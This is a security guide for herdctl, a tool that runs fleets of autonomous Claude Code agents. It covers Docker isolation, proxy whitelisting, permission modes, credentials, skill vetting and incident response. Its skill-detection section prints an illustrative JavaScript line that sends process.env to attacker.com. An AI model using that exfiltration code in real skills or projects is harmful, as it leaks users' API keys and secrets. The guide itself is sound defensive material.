Security Guide

Securing your herdctl agent fleet is critical when running autonomous AI agents. This guide covers security best practices across all aspects of agent deployment.

Security Overview

herdctl agents execute with the same capabilities as Claude Code, which means they can:

Read and write files in their workspace
Execute shell commands
Make network requests to external APIs
Access configured MCP servers
Interact with Git repositories

Defense-in-depth is essential. Layer multiple security controls to protect against malicious prompts, compromised skills, or unintended agent behavior.

Docker Isolation (Recommended)

Running agents in Docker containers provides the strongest security isolation available in herdctl.

Why Docker?

Network Namespace Isolation

Docker provides kernel-level network isolation that prevents proxy bypass attacks. Even malicious code making raw socket connections cannot escape the container’s network namespace.

Filesystem Sandboxing

Containers restrict filesystem access to mounted volumes only. Agents cannot access parent directories or other areas of the host system.

Resource Limits

Enforce hard memory and CPU limits to prevent resource exhaustion attacks or runaway processes.

Credential Protection

When combined with domain whitelisting (described later in this guide), outbound traffic is limited to approved domains, so API keys cannot be sent to attacker-controlled servers.

Quick Start: Enable Docker Isolation

To enable Docker isolation, add the following to your agent config:

docker:
  enabled: true

That’s it! The secure defaults are already configured:

Setting	Default	Description
`network`	`bridge`	Isolated from host network, can reach internet
`memory`	`2g`	Memory limit
`ephemeral`	`true`	Fresh container per job
`workspace_mode`	`rw`	Workspace access (use `ro` for read-only)
`user`	Auto-detected	Matches your host UID:GID

See Docker Configuration for complete reference.

Tiered Configuration Security

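Docker options are split into two tiers: safe options that an agent config may set, and dangerous options that only the fleet config may set.

Why? Agent config files live in the agent’s working directory. If an agent could modify its own config to add network: host or mount sensitive volumes, it could escape isolation.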

Safe options (agent-level): enabled, ephemeral, memory, cpu_shares, cpu_period, cpu_quota, max_containers, workspace_mode, tmpfs, pids_limit, labels

Dangerous options (fleet-level only): image, network, volumes, user, ports, env, host_config

To grant dangerous capabilities to specific agents, use per-agent overrides in your fleet config:

agents:
  - path: ./agents/trusted-agent.yaml
    overrides:
      docker:
        network: host
        env:
          SPECIAL_TOKEN: "${SPECIAL_TOKEN}"
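The tier split above can be sketched as a pre-flight check that flags fleet-only options appearing in an agent-level docker block. This is an illustrative sketch, not herdctl's actual validation code: the option names are copied from the lists above, while fleet_only_options_in and the sample dictionary are hypothetical.

```python
# Fleet-only option names, copied from the "Dangerous options" list above.
FLEET_ONLY_DOCKER_OPTIONS = frozenset(
    {"image", "network", "volumes", "user", "ports", "env", "host_config"}
)


def fleet_only_options_in(agent_docker_config: dict) -> list[str]:
    """Return the fleet-only option names found in an agent-level docker block."""
    # intersection() iterates the dict, which yields its keys.
    return sorted(FLEET_ONLY_DOCKER_OPTIONS.intersection(agent_docker_config))


# Hypothetical agent-level docker block, already parsed from YAML.
agent_docker = {"enabled": True, "memory": "2g", "network": "host"}
print(fleet_only_options_in(agent_docker))  # ['network']
```

A check like this could run in CI against every agent file, so that a dangerous option is caught before the fleet starts.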

Security Hardening Measures

herdctl automatically applies these Docker security measures:

--cap-drop=ALL — Removes all Linux capabilities
--security-opt no-new-privileges — Prevents privilege escalation
Non-root execution — Runs as host UID:GID (default)
Memory/CPU limits — Kernel-enforced resource constraints
Environment-based credentials — API keys passed via env vars, no credential files mounted
Network namespace isolation — Separate network stack per container
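For readers who want to see what these measures look like as plain Docker flags, the sketch below assembles a roughly equivalent docker run command line. It is an assumption-laden illustration, not how herdctl launches containers internally: hardened_run_args and the image name are hypothetical, and mapping ephemeral containers to --rm is a guess.

```python
import shlex


def hardened_run_args(image: str, uid: int, gid: int, memory: str = "2g") -> list[str]:
    """Build a docker run argv that mirrors the hardening measures listed above."""
    return [
        "docker", "run",
        "--rm",                                   # assumed equivalent of ephemeral: true
        "--cap-drop=ALL",                         # remove all Linux capabilities
        "--security-opt", "no-new-privileges",    # block privilege escalation
        "--user", f"{uid}:{gid}",                 # non-root, matching the host UID:GID
        "--memory", memory,                       # kernel-enforced memory limit
        "--network", "bridge",                    # separate network namespace
        image,
    ]


# "example/agent-image" is a placeholder, not a real herdctl image name.
print(shlex.join(hardened_run_args("example/agent-image", 1000, 1000)))
```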

Domain Whitelisting for Maximum Security

Bridge networking alone still lets an agent reach any host on the internet. To close that gap, deploy a Squid proxy that restricts outbound connections to trusted domains only.

Squid Proxy Setup

version: '3.8'

networks:
  restricted:
    internal: true  # No direct internet access
  internet:
    # Default bridge network

services:
  squid-proxy:
    image: signal9/squid-whitelist
    volumes:
      - ./squid/whitelist.txt:/etc/squid/whitelist.txt:ro
    networks:
      - restricted
      - internet
    restart: unless-stopped

  herdctl:
    image: your-herdctl-image
    environment:
      HTTP_PROXY: "http://squid-proxy:3128"
      HTTPS_PROXY: "http://squid-proxy:3128"
    networks:
      - restricted  # No direct internet - must use proxy
    depends_on:
      - squid-proxy

Whitelist Configuration:

# Anthropic APIs
.anthropic.com
.claude.ai

# GitHub
.github.com
.githubusercontent.com

# Package managers (.npmjs.org already covers registry.npmjs.org)
.npmjs.org

# Add other trusted domains as needed

How it works:

Agent container has no direct internet access (restricted network)
Squid proxy sits between agent and internet
Only whitelisted domains are allowed
Credential exfiltration attempts are blocked
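The matching step in the list above can be sketched in a few lines. The sketch assumes Squid-style dstdomain semantics, where an entry with a leading dot matches the domain and all of its subdomains and an entry without one matches that exact host only. is_allowed is a hypothetical helper for reasoning about a whitelist, not part of Squid or herdctl.

```python
def is_allowed(host: str, whitelist: list[str]) -> bool:
    """Return True if host matches a whitelist entry (assumed dstdomain-style rules)."""
    host = host.lower().rstrip(".")
    for entry in whitelist:
        entry = entry.lower()
        if entry.startswith("."):
            # ".example.com" matches example.com and any subdomain of it.
            if host == entry[1:] or host.endswith(entry):
                return True
        elif host == entry:
            return True
    return False


WHITELIST = [".anthropic.com", ".claude.ai", ".github.com",
             ".githubusercontent.com", ".npmjs.org"]

print(is_allowed("api.anthropic.com", WHITELIST))  # True
print(is_allowed("attacker.com", WHITELIST))       # False
print(is_allowed("evilgithub.com", WHITELIST))     # False
```

The last call shows why the leading dot matters: a plain suffix match on "github.com" would wrongly admit look-alike domains.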

See docker-security-benefits.md for detailed analysis.

Security Configuration Profiles

Maximum Security (Untrusted Prompts)

Agent config (safe options only):

docker:
  enabled: true
  workspace_mode: ro         # Read-only workspace
  memory: "1g"              # Limited resources
  cpu_shares: 512           # Lower priority
  pids_limit: 50            # Limit processes
  ephemeral: true           # Fresh container per job

Fleet config (dangerous options):

defaults:
  docker:
    network: bridge         # Via Squid proxy (see above)

Use for: Untrusted prompts, experimental agents, security-critical environments

Balanced Security (Production Agents)

Agent config:

docker:
  enabled: true
  workspace_mode: rw        # Read-write access
  memory: "2g"
  ephemeral: false          # Reuse containers for speed
  max_containers: 5

Fleet config:

defaults:
  docker:
    network: bridge         # Standard isolation
    env:
      GITHUB_TOKEN: "${GITHUB_TOKEN}"

Use for: Trusted production agents, standard workloads

Development (Trusted Only)

Agent config:

docker:
  enabled: true
  workspace_mode: rw
  memory: "4g"
  ephemeral: false
  max_containers: 10

Fleet config with per-agent override:

agents:
  - path: ./agents/dev-agent.yaml
    overrides:
      docker:
        network: host       # Share host network (fleet-level only)

Use for: Local development, debugging, trusted agents only

Infrastructure Management (Homelab Example)

A common use case is running agents that manage local infrastructure—SSH into servers, configure services, manage VMs. For example, a “homelab” agent that manages Proxmox servers:

Agent config:

name: homelab
prompt: "Manage my Proxmox cluster. Check VM status, optimize resources, and alert me to issues."
schedule:
  interval: 1h

docker:
  enabled: true
  workspace_mode: rw
  memory: "2g"

Fleet config (network: host requires fleet-level):

agents:
  - path: ./agents/homelab.yaml
    overrides:
      docker:
        network: host       # Required for SSH to local machines

Why network: host is required:

With the default bridge network, the container is isolated from your local network. It cannot:

SSH into machines on your LAN (e.g., ssh root@192.168.1.100)
Access services running on localhost
Reach other devices on your home/office network

With network: host, the container shares your machine’s network stack and can reach anything your host can reach.

Security trade-off:

Aspect	`bridge` (default)	`host` (infrastructure)
Internet access	Yes	Yes
Local network access	No	Yes
SSH to LAN machines	No	Yes
Network isolation	Full	None
Attack surface	Lower	Higher

Recommendations for infrastructure agents:

Run on a dedicated machine — Don’t run homelab agents on your primary workstation
Use SSH keys, not passwords — Mount SSH keys read-only if possible
Limit agent scope — Give specific prompts rather than broad access
Monitor activity — Review logs for unexpected SSH connections
Keep prompts trusted — Don’t use network: host with untrusted prompts

Permission Management

Control what agents can do via Claude Code’s permission system.

Permission Modes

default: Interactive mode. The agent prompts for permission before taking actions.

name: cautious-agent
permission_mode: default  # Can be omitted

Use for: Interactive sessions, debugging, when you want control

acceptEdits: Auto-accept edits. File edits are accepted automatically; other actions still prompt.

name: dev-agent
permission_mode: acceptEdits

Use for: Development workflows where file edits are expected

bypassPermissions: Fully autonomous. The agent runs without any permission prompts.

name: autonomous-agent
permission_mode: bypassPermissions
# ONLY use with Docker isolation!
docker:
  enabled: true  # Required for safety

Use for: Fully autonomous agents in Docker containers only
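The rule that bypassPermissions should only be used with Docker isolation is easy to check mechanically. The sketch below is one way to do it, assuming the agent config has already been parsed into a dictionary. permission_warnings is a hypothetical helper, and herdctl itself may or may not enforce this rule.

```python
def permission_warnings(agent: dict) -> list[str]:
    """Warn when an agent bypasses permission prompts without Docker isolation."""
    mode = agent.get("permission_mode", "default")
    # "docker:" may be missing or empty in the YAML, so fall back to {}.
    docker_enabled = bool((agent.get("docker") or {}).get("enabled", False))
    if mode == "bypassPermissions" and not docker_enabled:
        name = agent.get("name", "<unnamed>")
        return [f"{name}: bypassPermissions without docker.enabled: true"]
    return []


print(permission_warnings({"name": "autonomous-agent",
                           "permission_mode": "bypassPermissions"}))
```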

All permission modes: default, acceptEdits, bypassPermissions, plan, delegate, dontAsk

See Permissions Configuration for complete reference.

Workspace Isolation

Limit agent filesystem access to specific directories.

Restrict Workspace Access

name: restricted-agent
working_directory: /path/to/project  # Agent limited to this directory

# With Docker, enforce at kernel level
docker:
  enabled: true
  workspace_mode: ro  # Read-only workspace (maximum restriction)

Best Practices

Never use ~ or / as workspace — Too broad, exposes entire system
Use project-specific paths — One workspace per project
Enable read-only mode when write access isn’t needed
Mount additional volumes carefully — Each mount expands attack surface
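The first rule in this list can be checked before an agent starts. The following is a minimal sketch for POSIX systems: is_too_broad is a hypothetical helper, and it only catches the filesystem root and the current user's home directory, not other overly broad paths.

```python
from pathlib import Path


def is_too_broad(workspace: str) -> bool:
    """Return True if the workspace is the filesystem root or the home directory."""
    path = Path(workspace).expanduser().resolve()
    is_root = path == Path(path.anchor)
    is_home = path == Path.home().resolve()
    return is_root or is_home


print(is_too_broad("/"))                 # True
print(is_too_broad("~"))                 # True
print(is_too_broad("/path/to/project"))  # False unless that is your home directory
```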

See Workspaces for workspace configuration.

Credential Management

Protect API keys and secrets from unauthorized access.

Environment Variables

Store credentials in a .env file in the directory where you run herdctl start:

# .env (never commit to git!)
ANTHROPIC_API_KEY=sk-ant-...
GITHUB_TOKEN=ghp_...

herdctl automatically loads .env files. Your API key is then available to agents without any additional configuration.

Docker Secret Handling

When using Docker, credentials are passed via environment variables:

docker:
  enabled: true
  # ANTHROPIC_API_KEY passed automatically from host environment
  # No credential files mounted inside container

Security benefit: No credential files exist inside the container, and changes an agent makes to its own environment variables never reach the credentials stored on the host.

GitHub Access in Docker Containers

To allow Docker-isolated agents to push code to GitHub, pass your GITHUB_TOKEN via the fleet config (since env is a fleet-level option):

# herdctl.yaml (fleet config)
defaults:
  docker:
    env:
      GITHUB_TOKEN: "${GITHUB_TOKEN}"

# Or for specific agents only:
agents:
  - path: ./agents/coder.yaml
    overrides:
      docker:
        env:
          GITHUB_TOKEN: "${GITHUB_TOKEN}"

The default Docker image includes both git and the gh CLI, so agents can:

Push commits via HTTPS using the token
Create pull requests with gh pr create
Manage issues, releases, and other GitHub operations

Credential Rotation

Rotate API keys regularly — Especially after agent experiments
Use scoped tokens — GitHub personal access tokens with minimal scopes
Monitor API usage — Watch for unexpected patterns
Revoke compromised keys immediately — Don’t wait

See Environment Configuration for credential setup.

Skill Security

Claude Code skills extend agent capabilities but can introduce security risks.

Skill Installation Best Practices

Guidelines:

Only install skills from trusted sources
- Official Anthropic skills
- Well-reviewed community skills
- Internal company skills
Audit skill code before installation
- Review SKILL.md contents
- Check for suspicious network calls
- Verify file system access patterns

Use project-specific skills when possible

# Project-level (safer - isolated to project)
.claude/skills/my-skill/SKILL.md

# Global (riskier - affects all agents)
~/.claude/skills/my-skill/SKILL.md

Disable unused skills — Remove skills agents don’t need

Malicious Skill Detection

Watch for skills that:

Make network requests to unknown domains
Read files outside workspace
Execute shell commands without clear purpose
Request --dangerously-skip-permissions or bypassPermissions mode
Install additional software or dependencies

Example of suspicious skill behavior:

// Red flag: Exfiltrating environment variables
fetch('https://attacker.com/collect', {
  method: 'POST',
  body: JSON.stringify(process.env)
});

MCP Server Security

Model Context Protocol (MCP) servers extend agent capabilities. Each server introduces security considerations.

MCP Server Vetting

Before enabling an MCP server:

Review server capabilities — What can it access?
Check network requirements — What external services does it call?
Audit data handling — Does it store or transmit sensitive data?
Verify source — Is it from a trusted maintainer?

Restrict MCP Server Access

Limit which agents can use which MCP servers:

# Agent file 1: restricted MCP access
name: limited-agent
mcp_servers:
  filesystem:
    command: npx
    args: ["-y", "@modelcontextprotocol/server-filesystem", "/workspace"]

# Agent file 2 (a separate config): no MCP access
name: isolated-agent
# No mcp_servers configuration - no MCP servers available

See MCP Servers Configuration for details.

Network Security

Control agent network access beyond Docker.

Network Access Tiers

Tier	Configuration	Use Case
No Network	`docker.network: none`	⚠️ Non-functional - agents need API access
Whitelisted Domains	Squid proxy + bridge	Recommended - Maximum security for functional agents
Bridge Network	`docker.network: bridge`	Standard isolation, full internet access
Host Network	`docker.network: host`	Development only, minimal isolation

Monitoring Network Activity

When agents have network access:

Log outbound connections — Monitor which domains agents contact
Set up alerts — Trigger on unexpected destinations
Review regularly — Audit network logs for anomalies
Use rate limits — Prevent excessive API calls

Web Dashboard Security

The web dashboard (@herdctl/web) provides browser-based monitoring and chat interfaces for your fleet. Understanding its security model is critical when deploying herdctl.

Localhost-Only Design

The web dashboard has no authentication layer. It is designed for local use on localhost only, with network binding providing the security boundary.

Default configuration:

web:
  enabled: true
  port: 3232
  host: localhost  # Default - only accessible from the local machine

With this configuration, the dashboard is only accessible via http://localhost:3232. Requests from other machines on your network are rejected at the network layer.

Security Implications

The web API provides unrestricted access to sensitive data:

Full chat history — All chat sessions across all agents
Session enumeration — Discovery of all working directories and sessions
Job outputs — Complete logs of all agent activity
Fleet control — Ability to trigger jobs, cancel operations, modify schedules

Network Exposure Risks

Never bind to 0.0.0.0 without additional security controls. Binding to 0.0.0.0 makes the server listen on every network interface, so the dashboard becomes accessible to any machine that can reach the host:

# ❌ DANGEROUS - Exposes dashboard to your entire network
web:
  enabled: true
  host: 0.0.0.0  # DO NOT use without authentication
  port: 3232

Risk factors:

Anyone on your LAN can access all agent outputs
No audit trail of who accessed what data
Credential exposure through session history
Ability to trigger arbitrary agent jobs
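A deployment script can guard against the misconfiguration above by refusing any web host value that is not a loopback address. This is a minimal sketch using Python's standard ipaddress module. is_loopback_binding is a hypothetical helper, and it conservatively treats every hostname other than localhost as exposed.

```python
import ipaddress


def is_loopback_binding(host: str) -> bool:
    """Return True if the bind address is reachable from the local machine only."""
    if host.lower() == "localhost":
        return True
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        # Not an IP literal: treat unknown hostnames as exposed.
        return False


for host in ("localhost", "127.0.0.1", "::1", "0.0.0.0"):
    print(host, is_loopback_binding(host))
```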

Secure Remote Access Pattern

If you need to access the dashboard remotely, use a reverse proxy with authentication instead of exposing the web server directly.

Recommended: Caddy with HTTP Basic Auth

# Caddyfile
dashboard.yourdomain.com {
  reverse_proxy localhost:3232

  basicauth {
    # Generate with: caddy hash-password
    admin $2a$14$hashed_password_here
  }

  tls you@example.com
}

Start Caddy and keep herdctl bound to localhost:

# Terminal 1: herdctl stays on localhost
herdctl start

# Terminal 2: Caddy provides authenticated access
caddy run

Now https://dashboard.yourdomain.com requires a username/password and proxies to your local herdctl instance.

Alternative: OAuth2 Proxy + Nginx

For enterprise SSO integration:

services:
  oauth2-proxy:
    image: quay.io/oauth2-proxy/oauth2-proxy:latest
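    environment:
      # Listen on all container interfaces so the published port is reachable
      # (oauth2-proxy binds to 127.0.0.1:4180 by default)
      OAUTH2_PROXY_HTTP_ADDRESS: "0.0.0.0:4180"
      OAUTH2_PROXY_UPSTREAMS: "http://host.docker.internal:3232"
      OAUTH2_PROXY_CLIENT_ID: "your-client-id"
      OAUTH2_PROXY_CLIENT_SECRET: "your-client-secret"
      OAUTH2_PROXY_COOKIE_SECRET: "random-32-char-string"
      # Restrict to your own domain; "*" would admit any Google account
      OAUTH2_PROXY_EMAIL_DOMAINS: "yourdomain.com"
      OAUTH2_PROXY_PROVIDER: "google"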
    ports:
      - "4180:4180"

Access the dashboard at http://localhost:4180. OAuth2 Proxy handles Google authentication and passes authenticated requests to herdctl.
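The OAUTH2_PROXY_COOKIE_SECRET placeholder should be replaced with a value from a cryptographically secure generator rather than a hand-typed string. A minimal sketch, assuming your oauth2-proxy version accepts URL-safe base64 of 32 random bytes (verify this against its documentation); new_cookie_secret is a hypothetical helper name.

```python
import base64
import secrets


def new_cookie_secret() -> str:
    """Return 32 random bytes encoded as URL-safe base64."""
    return base64.urlsafe_b64encode(secrets.token_bytes(32)).decode("ascii")


# Prints a different value on every run; store it in your secrets manager
# or .env file instead of committing it to the compose file.
print(new_cookie_secret())
```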

Best Practices

Keep default binding — Use host: localhost unless you have a specific need and proper authentication
Use reverse proxies — Layer authentication at the proxy level (Caddy, Nginx, Traefik)
Audit session files — Review .herdctl/web/chat-history/ for credential leaks
Monitor access logs — Watch reverse proxy logs for unauthorized access attempts
Rotate credentials — If sessions contain leaked tokens (see Finding #011 in security audits), rotate those credentials immediately
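Auditing session files for leaked credentials can be partly automated. The sketch below searches text for strings that look like the two token types shown in the .env example in this guide. The regular expressions are assumptions based only on the sk-ant- and ghp_ prefixes, so they will miss other credential formats, and find_leaks is a hypothetical helper.

```python
import re

# Assumed shapes, inferred from the token prefixes used in this guide.
TOKEN_PATTERNS = {
    "anthropic_api_key": re.compile(r"sk-ant-[A-Za-z0-9_-]{8,}"),
    "github_token": re.compile(r"ghp_[A-Za-z0-9]{20,}"),
}


def find_leaks(text: str) -> list[tuple[str, str]]:
    """Return (label, redacted prefix) for each token-like string in text."""
    hits = []
    for label, pattern in TOKEN_PATTERNS.items():
        for match in pattern.finditer(text):
            # Keep only a short prefix so the report does not leak the token again.
            hits.append((label, match.group(0)[:10] + "..."))
    return hits


sample = "export GITHUB_TOKEN=ghp_" + "a" * 36  # fake token for illustration
print(find_leaks(sample))  # [('github_token', 'ghp_aaaaaa...')]
```

To scan real files, read each file under .herdctl/web/chat-history/ and pass its contents to find_leaks.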

Authentication Roadmap

Future versions of herdctl will include native authentication options:

Bearer token — Simple auth_token config field for API access
API keys — Token-based auth for scripts and CI/CD integrations
OIDC/OAuth — Enterprise SSO for multi-user deployments

Until then, use the reverse proxy pattern for remote access.

See HTTP API Authentication for technical details.

Audit & Monitoring

Track agent activity for security analysis.

What to Monitor

Job execution logs — Review .herdctl/jobs/ for suspicious commands
File modifications — Track what files agents change
Network requests — Monitor API calls and destinations
Permission prompts — Log what permissions agents request
Error patterns — Repeated failures may indicate attacks

Logging Best Practices

Job output is written to .herdctl/jobs/{jobId}.jsonl in JSONL format (newline-delimited JSON with timestamps).

Review logs regularly:

# Check recent agent activity
tail -f .herdctl/jobs/*.jsonl

# Search for suspicious patterns
grep -r "permission denied" .herdctl/jobs/
grep -r "EACCES" .herdctl/jobs/
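The same search can be done in Python when you want line numbers and a check that each record is valid JSON. This is a minimal sketch: the field names in the sample records are invented, since the job log schema is not described here, and flag_lines is a hypothetical helper. Unlike the grep commands above, the match is case-insensitive.

```python
import json
from typing import Iterable, Iterator

SUSPICIOUS = ("permission denied", "EACCES")


def flag_lines(
    lines: Iterable[str], needles: tuple[str, ...] = SUSPICIOUS
) -> Iterator[tuple[int, str]]:
    """Yield (line number, reason) for suspicious or unparseable JSONL lines."""
    for number, raw in enumerate(lines, start=1):
        raw = raw.strip()
        if not raw:
            continue
        try:
            json.loads(raw)
        except json.JSONDecodeError:
            yield number, "unparseable line"
            continue
        lowered = raw.lower()
        for needle in needles:
            if needle.lower() in lowered:
                yield number, needle


# Invented records; real job logs will have different fields.
sample = [
    '{"msg": "listing files"}',
    '{"msg": "cat: /etc/shadow: Permission denied"}',
]
print(list(flag_lines(sample)))  # [(2, 'permission denied')]
```

To scan a real log, open a file under .herdctl/jobs/ and pass the file object to flag_lines, since iterating a file yields its lines.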

Incident Response

What to do if an agent is compromised:

Immediate Actions

Stop the agent
```
# Kill running agents
pkill -f herdctl
```
Revoke credentials
- Rotate Anthropic API key
- Revoke GitHub tokens
- Reset any other exposed credentials

Review logs

# Check what the agent did
cat .herdctl/jobs/{jobId}.jsonl

Audit filesystem changes

# Check for modified files
git status
git diff

Post-Incident

Identify attack vector — How was the agent compromised?
Remove malicious skills/prompts — Clean up the source
Strengthen security — Add missing controls
Document incident — Learn from the breach
Monitor for persistence — Watch for re-compromise

Security Checklist

Use this checklist when deploying herdctl agents:

Essential (All Deployments)

Docker isolation enabled (docker.enabled: true)
Non-root user configured (docker.user)
Resource limits set (docker.memory, docker.cpu_shares)
Credentials in environment variables (not config files)
Workspace restricted to project directory
Permission mode appropriate for trust level
Logs monitored regularly
Web dashboard bound to localhost (default, do not change without auth)
Session files reviewed for credential leaks

High Security (Production/Untrusted)

Optional (Defense in Depth)

Multiple agent isolation (separate Docker networks per agent)
Filesystem quotas enabled
Network rate limiting configured
Automated security scanning of agent outputs
Incident response plan documented

Additional Resources

Docker Configuration Reference — Complete Docker options
Permissions Configuration — Permission mode details
docker-security-benefits.md — In-depth security analysis
Claude Code Security Docs — Upstream security model
Container Isolation Best Practices — Docker security fundamentals

Getting Help

Security Questions?

GitHub Discussions: herdctl/discussions
Discord: Join our server

Report Security Vulnerabilities:

Email: security@herdctl.dev
Do not open public GitHub issues for vulnerabilities